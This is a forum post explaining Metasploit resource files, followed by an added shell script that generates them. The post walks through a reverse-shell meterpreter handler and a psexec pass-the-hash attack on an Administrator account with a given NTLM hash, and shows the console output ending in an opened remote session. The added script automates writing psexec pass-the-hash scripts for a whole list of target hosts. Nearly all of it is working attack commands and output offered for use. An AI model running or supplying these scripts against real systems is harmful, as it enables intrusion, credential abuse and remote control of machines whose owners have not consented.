182 METASPLOIT rc files
Posted on 2012-10-2 16:01:10
What is an RC file? A handy way to run metasploit quickly: a resource script that feeds msfconsole a list of commands, one per line, in order.
WebSploit and thread 175 (metasploit smart cracking) both drive METASPLOIT with RC files.
An example:

root@bt:~# touch meterpreter.rc
root@bt:~# echo use exploit/multi/handler >> meterpreter.rc
root@bt:~# echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
root@bt:~# echo set LHOST 192.168.1.184 >> meterpreter.rc
root@bt:~# echo set ExitOnSession false >> meterpreter.rc
root@bt:~# echo exploit -j -z >> meterpreter.rc
root@bt:~# cat meterpreter.rc
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.184
set ExitOnSession false
exploit -j -z

We have written a meterpreter.rc file; now run it (ExitOnSession false with exploit -j -z keeps the handler listening in the background for more than one callback):
root@bt:~# msfconsole -r meterpreter.rc

       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
       =[ svn r14551 updated yesterday (2012.01.14)

resource> use exploit/multi/handler
resource> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource> set LHOST 192.168.1.184
LHOST => 192.168.1.184
resource> set ExitOnSession false
ExitOnSession => false
resource> exploit -j -z
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...

Now look at this file (a per-target psexec script; note that setg sets LHOST globally, so every module loaded later in the same console inherits it, while set only applies to the current module; SMBPass is given the LM:NT hash pair, so this is pass-the-hash rather than a cleartext password):
use windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
setg LHOST 192.168.1.182
set RHOST 192.168.1.230
set SMBPass aad3b435b51404eeaad3b435b51404ee:49e02f1338d4b2bf743beeb97aee524d
set SMBUser Administrator
exploit

There are two ways to run it:

1. From the command line, when starting the console:

msfconsole -r /root/2011-03-21_acme/192.168/1/230/230_psexec.rc

2. From inside an already running console, with the resource command:

msf> resource /root/2011-03-21_acme/192.168/1/230/230_psexec.rc



Result:
root@bt:~# msfconsole -r /root/2011-03-21_acme/192.168/1/230/230_psexec.rc

                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
/     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|


       =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 653 exploits - 343 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
       =[ svn r11970 updated 5 days ago (2011.03.15)

resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> use windows/smb/psexec
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> setg LHOST 192.168.1.182
LHOST => 192.168.1.182
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set RHOST 192.168.1.230
RHOST => 192.168.1.230
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set SMBPass aad3b435b51404eeaad3b435b51404ee:49e02f1338d4b2bf743beeb97aee524d
SMBPass => aad3b435b51404eeaad3b435b51404ee:49e02f1338d4b2bf743beeb97aee524d
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set SMBUser Administrator
SMBUser => Administrator
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> exploit
[*] Started reverse handler on 192.168.1.182:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.1.230:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \TwLkuthH.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.230[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.230[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (dcZDWuwa - "MluCkfMYLQRNHpqECJiJY")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Sending stage (749056 bytes) to 192.168.1.230
[*] Closing service handle...
[*] Deleting \TwLkuthH.exe...
[*] Meterpreter session 1 opened (192.168.1.182:4444 -> 192.168.1.230:49305) at Sun Mar 20 23:45:20 +0000 2011

meterpreter >




Only after playing a thousand tunes does one understand music; only after examining a thousand swords does one know weapons.
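As an added example (not part of the original post, and not Metasploit's own code), the following POSIX shell script generates the two kinds of resource file shown above from shell variables, validates the LM:NT hash format that SMBPass accepts for pass-the-hash, and sanity-checks each generated file before it is handed to msfconsole -r. It goes a little beyond the post by producing one psexec script per target from a list. The function names, the per-host directory layout, and the target list are this example's own assumptions; the addresses and the hash are placeholders.

```shell
#!/bin/sh
# Added example, not from the original post: build handler and psexec
# resource scripts from variables and check them before running
# `msfconsole -r <file>`. All hosts, users and hashes below are placeholders.

# Persistent multi/handler script. ExitOnSession false plus exploit -j -z
# keeps the listener running in the background for several callbacks.
gen_handler_rc() {
  lhost=$1; lport=$2; out=$3
  cat > "$out" <<EOF
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF
}

# Per-target psexec script. setg makes LHOST global (inherited by modules
# loaded later in the same console); the other options stay module-scoped.
gen_psexec_rc() {
  lhost=$1; rhost=$2; user=$3; hash=$4; out=$5
  cat > "$out" <<EOF
use exploit/windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
setg LHOST $lhost
set RHOST $rhost
set SMBUser $user
set SMBPass $hash
exploit
EOF
}

# SMBPass takes either a cleartext password or an LM:NT hash pair
# (32 hex chars, colon, 32 hex chars). Succeeds only for the hash form.
is_lm_nt_hash() {
  printf '%s' "$1" | grep -Eq '^[0-9a-fA-F]{32}:[0-9a-fA-F]{32}$'
}

# Structural check for a generated .rc: exactly one 'use' line, it comes
# first, and the final command is 'exploit' or 'run'. Catches truncated
# or accidentally concatenated files before they reach msfconsole.
rc_check() {
  f=$1
  [ "$(grep -c '^use ' "$f")" -eq 1 ] || return 1
  [ "$(head -n 1 "$f" | cut -d' ' -f1)" = "use" ] || return 1
  last=$(grep -v '^[[:space:]]*$' "$f" | tail -n 1 | cut -d' ' -f1)
  [ "$last" = "exploit" ] || [ "$last" = "run" ] || return 1
  return 0
}

# One psexec script per target under BASE/a/b/c/d/psexec.rc (an assumed
# layout, similar in spirit to the per-host paths in the post). Prints the
# number of scripts written; fails if any generated file fails rc_check.
gen_batch() {
  base=$1; lhost=$2; user=$3; hash=$4; shift 4
  is_lm_nt_hash "$hash" || return 1
  n=0
  for rhost in "$@"; do
    dir="$base/$(printf '%s' "$rhost" | tr . /)"
    mkdir -p "$dir"
    gen_psexec_rc "$lhost" "$rhost" "$user" "$hash" "$dir/psexec.rc"
    rc_check "$dir/psexec.rc" || return 1
    n=$((n + 1))
  done
  echo "$n"
}

# Usage: sh rcgen.sh demo   (writes ./meterpreter.rc in the current directory)
if [ "${1:-}" = "demo" ]; then
  gen_handler_rc 192.168.1.184 4444 ./meterpreter.rc
  rc_check ./meterpreter.rc && echo "ok: msfconsole -r ./meterpreter.rc"
fi
```

The generated files are plain command lists, so the same scripts work with both launch methods from the post: msfconsole -r on startup, or resource from inside a running console.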
